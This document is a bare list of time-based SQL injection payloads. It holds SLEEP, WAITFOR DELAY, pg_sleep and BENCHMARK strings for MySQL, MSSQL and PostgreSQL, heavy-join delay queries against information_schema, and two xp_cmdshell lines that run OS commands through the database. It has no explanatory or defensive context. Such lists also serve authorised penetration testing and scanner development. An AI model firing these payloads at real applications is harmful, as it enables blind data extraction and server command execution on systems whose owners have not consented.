# Time-based SQL Injection Payloads
' AND SLEEP(5)--
' AND SLEEP(5) AND 'a'='a
1' AND SLEEP(5)--
1' AND SLEEP(5) AND '1'='1
' AND SLEEP(10)--
' AND SLEEP(3)--
1' AND SLEEP(3)--
' OR SLEEP(5)--
1' OR SLEEP(5)--
' WAITFOR DELAY '0:0:5'--
1' WAITFOR DELAY '0:0:5'--
' WAITFOR DELAY '0:0:10'--
' WAITFOR DELAY '00:00:05'--
'; WAITFOR DELAY '0:0:5'--
1' WAITFOR DELAY '00:00:05'--
' OR WAITFOR DELAY '0:0:5'--
1' OR WAITFOR DELAY '0:0:5'--
' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--
1' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--
' AND (SELECT 1 FROM pg_sleep(5))--
1' AND (SELECT 1 FROM pg_sleep(5))--
' OR (SELECT 1 FROM pg_sleep(5))--
1' OR (SELECT 1 FROM pg_sleep(5))--
' AND BENCHMARK(5000000, MD5('test'))--
' AND BENCHMARK(10000000, MD5('test'))--
1' AND BENCHMARK(5000000, MD5('test'))--
' OR BENCHMARK(5000000, MD5('test'))--
1' OR BENCHMARK(5000000, MD5('test'))--
' AND (SELECT COUNT(*) FROM information_schema.columns A, information_schema.columns B)--
1' AND (SELECT COUNT(*) FROM information_schema.columns A, information_schema.columns B)--
' OR (SELECT COUNT(*) FROM information_schema.columns A, information_schema.columns B)--
';exec master..xp_cmdshell 'ping 127.0.0.1 -n 5'--
';exec master..xp_cmdshell 'ping 127.0.0.1 -n 10'--
